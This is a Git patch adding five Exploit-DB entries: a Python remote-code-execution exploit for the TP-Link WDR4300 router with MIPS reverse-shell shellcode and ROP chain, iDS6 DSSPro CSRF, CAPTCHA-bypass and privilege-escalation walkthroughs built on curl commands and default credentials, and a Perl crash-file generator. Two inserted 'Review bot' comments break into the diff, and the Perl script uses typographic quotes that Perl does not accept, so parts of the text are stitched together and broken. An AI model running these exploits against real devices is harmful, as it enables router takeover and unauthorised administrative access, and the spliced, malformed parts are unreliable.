From 6eb03eae2373167727bc9a47ccd1668688e2747b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 6 Nov 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-11-06 5 changes to exploits/shellcodes Amarok 2.8.0 - Denial-of-Service TP-Link WDR4300 - Remote Code Execution (Authenticated) iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
---
 exploits/hardware/remote/48994.py | 219 ++++++++++++++++++++++++++++
 exploits/hardware/webapps/48990.txt | 61 ++++++++
 exploits/hardware/webapps/48991.txt | 77 ++++++++++
 exploits/hardware/webapps/48992.txt | 121 +++++++++++++++
 exploits/windows/local/48993.pl | 15 ++
 files_exploits.csv | 5 +
 6 files changed, 498 insertions(+)
 create mode 100755 exploits/hardware/remote/48994.py
 create mode 100644 exploits/hardware/webapps/48990.txt
 create mode 100644 exploits/hardware/webapps/48991.txt
 create mode 100644 exploits/hardware/webapps/48992.txt
 create mode 100755 exploits/windows/local/48993.pl
diff --git a/exploits/hardware/remote/48994.py b/exploits/hardware/remote/48994.py
new file mode 100755
index 000000000..fea6cbe01
--- /dev/null
+++ b/exploits/hardware/remote/48994.py
@@ -0,0 +1,219 @@ +# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated) +# Date: 2020-08-28 +# Exploit Author: Patrik Lantz +# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/ +# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router +# Tested on: Firmware version 3.13.33 and 3.14.3 +# CVE : CVE-2017-13772 + +#!/usr/bin/python3 + +import sys +import hashlib +import base64 +import requests +import binascii +import socket + + +""" +RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772. +Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1 + +Usage: +1) Start listener on attacker machine: nc -nlvvp 31337 +2) Execute script: python exploit.py + +""" + +def main(argv): + if len(sys.argv) < 2: + print("Usage: python exploit.py ") + sys.exit(1) + + password = "admin" + target = "192.168.0.1:80" + attacker_ip = sys.argv[1] + + attacker = binascii.hexlify(socket.inet_aton(attacker_ip)) + ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)] + + if '00' in ip or '20' in ip: + print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. 
and .32.") + sys.exit(1) + + url = "http://" + target + "/" + try: + r = requests.get(url=url) + except: + print("[-] Could not connect to target: " + target) + sys.exit(1) + + if 'WWW-Authenticate' in r.headers.keys(): + if not 'WDR4300' in r.headers['WWW-Authenticate']: + print("[-] This is not TP-Link WDR4300 (N750)") + sys.exit(1) + else: + print("[-] This does not seem to be the web interface of a router!") + + + credentials = "admin" + ":" + hashlib.md5(password).hexdigest() + auth = base64.b64encode(credentials) + url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save" + + print("[+] Setting target to: " + target) + print("[+] Using default admin password: " + password) + print("[+] Cookie set to: Authorization=Basic%20" + auth) + + h = {} + h["Cookie"] = "Authorization=Basic%20" + auth + h['Upgrade-Insecure-Requests'] = '1' + h['Referer'] = 'http://' + target + '/' + + r = requests.get(url = url, headers=h) + data = r.text + if "httpAutErrorArray" in data: + print('[-] Could not login to the admin interface') + sys.exit(1) + + older_fw = False + # older firmware, e.g., 3.13.33 + if "Login Incorrect" in data: + print("[-] Incorrect login, perhaps an older firmware? 
Sending digest authetnication using the Authorization header instead..") + credentials = "admin:" + password + auth = base64.b64encode(credentials) + url = "http://" + target + "/" + h = {} + h["Authorization"] = "Basic%20" + auth + h['Upgrade-Insecure-Requests'] = '1' + h['Referer'] = 'http://' + target + '/' + r = requests.get(url = url, headers=h) + data = r.text + if 'window.parent.location.href' not in data: + print("[-] Failed to login to the admin interface") + sys.exit(1) + print('[+] Older firmware confirmed, successfully logged in') + older_fw = True + + authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','') + + + unique_id = '' + if not older_fw: + unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/' + print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/','')) + + # now we deliver the exploit payload via a GET request + h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm' + + + # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes) + nopsled = "" + for i in range(12): + nopsled += "\x26\x40\x08\x01" + + # identified bad characters: 0x20,0x00 + # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541 + buf = b"" + buf += "\x24\x0f\xff\xfa" # li $t7, -6 + buf += "\x01\xe0\x78\x27" # nor $t7, $zero + buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3 + buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3 + buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 + buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp) + buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) + buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET ) + buf += "\x01\xe0\x78\x27" # nor $t7, $zero + buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp) + buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 ) + buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69 + buf += 
"\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp) + buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ... + buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD + buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp) + buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e + buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 ) + buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero + buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\x24\x0f\xff\xfd" # li t7,-3 + buf += "\x01\xe0\x28\x27" # nor a1,t7,zero + buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) + buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff) + buf += "\x24\x01\xff\xff" # li at,-1 + buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop + buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 + buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f + buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269 + buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp) + buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f + buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368 + buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp) + buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp) + buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14 + buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp) + buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp) + buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8 + buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + + shellcode = nopsled + buf + + """ + We control $ra, $s0 and $s1 via the buffer overflow. 
+ + libc_base: 0x2aae2000 + First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974 + 0x0004c97c move t9, s0 + 0x0004c980 lw ra, (var_1ch) + 0x0004c984 lw s0, (var_18h) + 0x0004c988 addiu a0, zero, 2 ; arg1 + 0x0004c98c addiu a1, zero, 1 ; arg2 + 0x0004c990 move a2, zero + 0x0004c994 jr t9 + + sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0 + + This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980. + + + Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8 + 0x00039fa8 addiu s0, sp, 0x28 + 0x00039fac move a0, s3 + 0x00039fb0 move a1, s0 + 0x00039fb4 move t9, s1 + 0x00039fb8 jalr t9 + + This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28. + Then as we control s1, we jump to the last and third ROP gadget. + + Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8 + 0x000406d8 move t9, s0 + 0x000406dc jalr t9 + + Jump to the shellcode pointed in s0. + """ + + sleep_addr = "\x2a\xb3\x5c\xa0" + sleep_gadget = "\x2a\xb2\xe9\x74" + stack_gadget = "\x2a\xb1\xbf\xa8" + call_gadget = "\x2a\xb2\x26\xd8" + + junk = "J"*28 + payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode + + p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'} + url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm" + print("[+] Delivering exploit payload to: " + url) + try: + r = requests.get(url = url, params=p, headers=h, timeout=10) + except: + print("[+] Finished delivering exploit") + + +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/hardware/webapps/48990.txt b/exploits/hardware/webapps/48990.txt new file mode 100644 index 000000000..babc11d1c --- /dev/null 
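Review bot: The comment header of 48994.py names the CVE and the tested firmware builds but leaves the preconditions and the observable request buried in main(), where `password = "admin"` and the `ping_addr` parameter sent to `userRpm/PingIframeRpm.htm` are hard-coded. I would add a few comment lines under `# CVE : CVE-2017-13772` saying that the overflow is reachable only after a successful login to the web management interface, that the script depends on the default admin password being unchanged, and that the request stands out in a proxy or router log by a `ping_addr` value far longer than any hostname or IP address. With that in the header a reader triaging the entry sees the mitigations (non-default admin password, management interface not reachable from untrusted networks, the vendor's fixed firmware if one exists for this hardware revision) without walking through the shellcode. The `#!/usr/bin/python3` line also sits below the comment block, where it has no effect as an interpreter line; it belongs on line 1 or should be dropped.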
+++ b/exploits/hardware/webapps/48990.txt @@ -0,0 +1,61 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF) + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management system +is a web-based server software solution for Windows. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5606 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php + + +16.07.2020 + +-- + + +Add user: +--------- + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48991.txt b/exploits/hardware/webapps/48991.txt new file mode 100644 index 000000000..d70da2432 --- /dev/null +++ b/exploits/hardware/webapps/48991.txt 
@@ -0,0 +1,77 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management +system is a web-based server software solution for Windows. + +Desc: The CAPTCHA function for DSSPro is prone to a security bypass +vulnerability that occurs in the CAPTCHA authentication routine. By +requesting the autoLoginVerifyCode object an attacker can receive a +JSON message code and successfully bypass the CAPTCHA-based authentication +challenge and perform brute-force attacks. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5607 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php + + +16.07.2020 + +-- + + +Get CAPTCHA code: +----------------- + +$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt + +{"success":true,"message":"6435","data":"6435"} + + +Use CAPTCHA code: +----------------- + +$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.autosave=true; 
Expires=Wed, 01-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT +Cache-Control: no-cache +Pragma: no-cache +Content-Type: application/x-json;charset=UTF-8 +Date: Tue, 21 Jul 2020 19:41:26 GMT +Connection: close +Content-Length: 16 + +{"success":true} \ No newline at end of file diff --git a/exploits/hardware/webapps/48992.txt b/exploits/hardware/webapps/48992.txt new file mode 100644 index 000000000..1af4479fe --- /dev/null +++ b/exploits/hardware/webapps/48992.txt 
@@ -0,0 +1,121 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management system +is a web-based server software solution for Windows. + +Desc: The application suffers from a privilege escalation vulnerability. +An authenticated user can elevate his/her privileges by calling JS functions +from the console or by insecure direct object references to hidden functionalities +that can result in creating users, modifying roles and permissions and full +takeover of the application. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5608 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php + + +16.07.2020 + +-- + + +-------------------- +Default credentials: +-------------------- + +admin:123456 (id: n/k, access: /admin) +boss:boss (id: 100001, access: /) +user:user (id: 100002, access: /) + + +---------------------------- +Once logged-in, create user: +---------------------------- + +In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action) +Type: add() + +or issue a POST request: + +$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: 
JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +-------------- +List user IDs: +-------------- + +$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------ +Create role: +------------ + +In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action): +Type: add() + +or issue a POST request: + +$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +-------------- +List role IDs: +-------------- + +$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------------------------------------ +Apply all permissions to the created role: +------------------------------------------ + +$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53" + + +------------------------------------ +Assign created role to created user: +------------------------------------ + +$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------ +Delete user: +------------ + +In Console, once navigated to the Accounts->User page 
(http://192.168.1.88/Pages/user.action), select desired username: +Type: del() + +or issue a POST request: + +$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" \ No newline at end of file diff --git a/exploits/windows/local/48993.pl b/exploits/windows/local/48993.pl new file mode 100755 index 000000000..57f42b26a --- /dev/null +++ b/exploits/windows/local/48993.pl @@ -0,0 +1,15 @@ +# Exploit Title: Amarok 2.8.0 - Denial-of-Service +# Date: 1 November 2020 +# Exploit Author: FishballAndMeatball +# Vendor Homepage: https://amarok.kde.org/ +# Software link: https://community.kde.org/Amarok/GettingStarted/Download +# Version: Amarok 2.8.0 +# Tested on: Windows 10, Windows 7, Windows XP +# CVE: CVE-2020-13152 + +my $file= “test_big.m3u“; +my $junk= “\x41” x 6368545; +open($FILE,”>$file”); +print $FILE “$junk”; +close($FILE); +print “m3u File Created successfully\n”; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 93fa6337f..c47e81c8a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
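Review bot: Every string literal in 48993.pl is delimited with typographic quotes (`“test_big.m3u“`, `”>$file”`), which Perl does not accept as string delimiters, so the file as committed looks like it was passed through a word processor and is probably not what the author ran; the archive should carry the original ASCII-quoted bytes. The `open` call is also the two-argument form with an undeclared global handle and no error check; `open(my $fh, '>', $file) or die "cannot write $file: $!";` is the form I would expect. The header gives the CVE but not which input triggers the fault or how the player fails, and one comment line on that would help anyone assessing exposure.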
@@ -10399,6 +10399,7 @@ id,file,description,date,author,type,platform,port
 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
 48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
 48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
+48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -17837,6 +17838,7 @@ id,file,description,date,author,type,platform,port
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
 48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
+48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -40808,6 +40810,9 @@ id,file,description,date,author,type,platform,port
 48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
 48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
 48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
+48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware,
+48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware,
+48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,